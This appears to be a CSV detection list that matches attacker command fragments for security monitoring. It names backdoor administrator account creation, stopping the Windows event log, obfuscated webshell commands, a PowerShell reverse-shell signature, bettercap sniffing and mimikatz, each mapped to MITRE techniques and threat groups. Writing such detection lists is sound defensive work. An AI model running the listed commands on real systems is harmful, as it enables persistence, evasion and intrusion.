"*net group *domain admins* /domain*",".{0,1000}net\sgroup\s.{0,1000}domain\sadmins.{0,1000}\s\/domain.{0,1000}","offensive_tool_keyword","net","Conti Ransomware Proxyshell PowerShell command #9","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008  - TA0001","Conti ransomware - TrickBot","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Ransomware","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A","N/A","52790"
"*net group *Enterprise Admins* /dom*",".{0,1000}net\sgroup\s.{0,1000}Enterprise\sAdmins.{0,1000}\s\/dom.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","52794"
"*net group / domain *Domain Admins*",".{0,1000}net\sgroup\s\/\sdomain\s.{0,1000}Domain\sAdmins.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","52801"
"*net localg""""&pgh&""""roup *",".{0,1000}net\slocalg\""\&pgh\&\""roup\s.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#windows","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","52805"
"*net localg""""+ezyq+""""roup *",".{0,1000}net\slocalg\""\+ezyq\+\""roup\s.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#windows","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","52806"
"*net localgroup * AutoRDPwn /add*",".{0,1000}net\slocalgroup\s.{0,1000}\sAutoRDPwn\s\/add.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","0","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","52809"
"*net localgroup administrators /add troll*",".{0,1000}net\slocalgroup\sadministrators\s\/add\stroll.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","N/A","10","1","87","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z","52813"
"*net localgroup administrators backdoor*",".{0,1000}net\slocalgroup\sadministrators\sbackdoor.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SimpleBackdoorAdmin","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","52814"
"*net localgroup administrators backdoor*",".{0,1000}net\slocalgroup\sadministrators\sbackdoor.{0,1000}","offensive_tool_keyword","SimpleBackdoorAdmin","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SimpleBackdoorAdmin","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","52815"
"*net localgroup administrators BadAss /add*",".{0,1000}net\slocalgroup\sadministrators\sBadAss\s\/add.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","52816"
"*net localgroup administrators darkcodersc /add*",".{0,1000}net\slocalgroup\sadministrators\sdarkcodersc\s\/add.{0,1000}","offensive_tool_keyword","win-brute-logon","Crack any Microsoft Windows users password without any privilege (Guest account included)","T1110.001 - T1078.001 - T1187 - T1055 - T1547 - T1003.005","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/PhrozenIO/win-brute-logon","1","0","N/A","N/A","7","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","52817"
"*net localgroup administrators drat /add*",".{0,1000}net\slocalgroup\sadministrators\sdrat\s\/add.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","52818"
"*net localgroup administrators icebreaker*",".{0,1000}net\slocalgroup\sadministrators\sicebreaker.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","52819"
"*net localgroup guests GuestUser /add*",".{0,1000}net\slocalgroup\sguests\sGuestUser\s\/add.{0,1000}","offensive_tool_keyword","win-brute-logon","Crack any Microsoft Windows users password without any privilege (Guest account included)","T1110.001 - T1078.001 - T1187 - T1055 - T1547 - T1003.005","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/PhrozenIO/win-brute-logon","1","0","N/A","N/A","7","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","52822"
"*net localgroup users GuestUser /delete*",".{0,1000}net\slocalgroup\susers\sGuestUser\s\/delete.{0,1000}","offensive_tool_keyword","win-brute-logon","Crack any Microsoft Windows users password without any privilege (Guest account included)","T1110.001 - T1078.001 - T1187 - T1055 - T1547 - T1003.005","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/PhrozenIO/win-brute-logon","1","0","N/A","N/A","7","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","52823"
"*net start SysUpdate*",".{0,1000}net\sstart\sSysUpdate.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","52839"
"*net stop \""windows event log\""*",".{0,1000}net\sstop\s\\\""windows\sevent\slog\\\"".{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","N/A","10","6","599","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z","52866"
"*net stop badrv*",".{0,1000}net\sstop\sbadrv.{0,1000}","offensive_tool_keyword","defender-control","disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","52880"
"*net stop IKEEXT*",".{0,1000}net\sstop\sIKEEXT.{0,1000}","offensive_tool_keyword","Ikeext-Privesc","Windows IKEEXT DLL Hijacking Exploit Tool","T1546.011 - T1574.009 - T1036.004","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/securycore/Ikeext-Privesc","1","0","N/A","N/A","10","1","33","52","2018-02-25T13:45:15Z","2018-02-27T11:18:56Z","52900"
"*net u""""+rmct+""""ser *",".{0,1000}net\su\""\+rmct\+\""ser\s.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#windows","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","53030"
"*net us""""&skj&""""er *",".{0,1000}net\sus\""\&skj\&\""er\s.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#windows","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","53031"
"*net user /add icebreaker *",".{0,1000}net\suser\s\/add\sicebreaker\s.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","53034"
"*net user AutoRDPwn*",".{0,1000}net\suser\sAutoRDPwn.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","0","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","53036"
"*net user b4che10r *",".{0,1000}net\suser\sb4che10r\s.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#windows","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","53037"
"*net user backdoor Password123!*",".{0,1000}net\suser\sbackdoor\sPassword123!.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SimpleBackdoorAdmin","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","53038"
"*net user backdoor Password123!*",".{0,1000}net\suser\sbackdoor\sPassword123!.{0,1000}","offensive_tool_keyword","SimpleBackdoorAdmin","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SimpleBackdoorAdmin","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","53039"
"*net user BadAss FacePalm01 /add*",".{0,1000}net\suser\sBadAss\sFacePalm01\s\/add.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","53040"
"*net user darkcodersc /add*",".{0,1000}net\suser\sdarkcodersc\s\/add.{0,1000}","offensive_tool_keyword","win-brute-logon","Crack any Microsoft Windows users password without any privilege (Guest account included)","T1110.001 - T1078.001 - T1187 - T1055 - T1547 - T1003.005","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/PhrozenIO/win-brute-logon","1","0","N/A","N/A","7","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","53042"
"*net user darkcodersc trousers*",".{0,1000}net\suser\sdarkcodersc\strousers.{0,1000}","offensive_tool_keyword","win-brute-logon","Crack any Microsoft Windows users password without any privilege (Guest account included)","T1110.001 - T1078.001 - T1187 - T1055 - T1547 - T1003.005","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/PhrozenIO/win-brute-logon","1","0","N/A","N/A","7","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","53043"
"*net user drat /del*",".{0,1000}net\suser\sdrat\s\/del.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","53044"
"*net user drat drat /add*",".{0,1000}net\suser\sdrat\sdrat\s\/add.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","53045"
"*net user GuestUser /add*",".{0,1000}net\suser\sGuestUser\s\/add.{0,1000}","offensive_tool_keyword","win-brute-logon","Crack any Microsoft Windows users password without any privilege (Guest account included)","T1110.001 - T1078.001 - T1187 - T1055 - T1547 - T1003.005","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/PhrozenIO/win-brute-logon","1","0","N/A","N/A","7","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","53047"
"*net user HackMe *",".{0,1000}net\suser\sHackMe\s.{0,1000}","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","0","N/A","N/A","N/A","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","53048"
"*net user HackMe /add*",".{0,1000}net\suser\sHackMe\s\/add.{0,1000}","offensive_tool_keyword","win-brute-logon","Crack any Microsoft Windows users password without any privilege (Guest account included)","T1110.001 - T1078.001 - T1187 - T1055 - T1547 - T1003.005","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/PhrozenIO/win-brute-logon","1","0","N/A","N/A","7","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","53049"
"*net user HackMe ozlq6qwm*",".{0,1000}net\suser\sHackMe\sozlq6qwm.{0,1000}","offensive_tool_keyword","win-brute-logon","Crack any Microsoft Windows users password without any privilege (Guest account included)","T1110.001 - T1078.001 - T1187 - T1055 - T1547 - T1003.005","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/PhrozenIO/win-brute-logon","1","0","N/A","N/A","7","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","53050"
"*net user hax0r /add*",".{0,1000}net\suser\shax0r\s\/add.{0,1000}","offensive_tool_keyword","RPC-Backdoor","A basic emulation of an ""RPC Backdoor""","T1071.004","TA0011","N/A","N/A","C2","https://github.com/eladshamir/RPC-Backdoor","1","0","N/A","N/A","10","10","240","45","2022-08-25T14:37:41Z","2022-08-16T13:12:05Z","53051"
"*net user john H4x00r123*",".{0,1000}net\suser\sjohn\sH4x00r123.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","53052"
"*net user john H4x00r123*",".{0,1000}net\suser\sjohn\sH4x00r123.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","53053"
"*net user Tater *",".{0,1000}net\suser\sTater\s.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","53059"
"*net users /add troll Trolololol123*",".{0,1000}net\susers\s\/add\stroll\sTrolololol123.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","N/A","10","1","87","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z","53060"
"*net.fuzz *",".{0,1000}net\.fuzz\s.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 -  BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","0","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","53078"
"*net.fuzz.*",".{0,1000}net\.fuzz\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 -  BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","0","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","53079"
"*net.pipe://*/MakeMeAdmin/Service""*",".{0,1000}net\.pipe\:\/\/.{0,1000}\/MakeMeAdmin\/Service\"".{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","53080"
"*net.probe on",".{0,1000}net\.probe\son","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 -  BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","0","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","53081"
"*net.probe on*",".{0,1000}net\.probe\son.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 -  BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","0","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","53082"
"*net.sniff *",".{0,1000}net\.sniff\s.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 -  BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","0","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","53083"
"*net.sniff.*",".{0,1000}net\.sniff\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 -  BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","0","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","53084"
"*Net.Sockets.TCPClient*Net.Security.SslStream*AuthenticateAsClient*Invoke-Expression*Out-String*",".{0,1000}Net\.Sockets\.TCPClient.{0,1000}Net\.Security\.SslStream.{0,1000}AuthenticateAsClient.{0,1000}Invoke\-Expression.{0,1000}Out\-String.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","53085"
"*net.tcp://*/MakeMeAdmin/Service*",".{0,1000}net\.tcp\:\/\/.{0,1000}\/MakeMeAdmin\/Service.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","53086"
"*net::alias*",".{0,1000}net\:\:alias.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","53087"
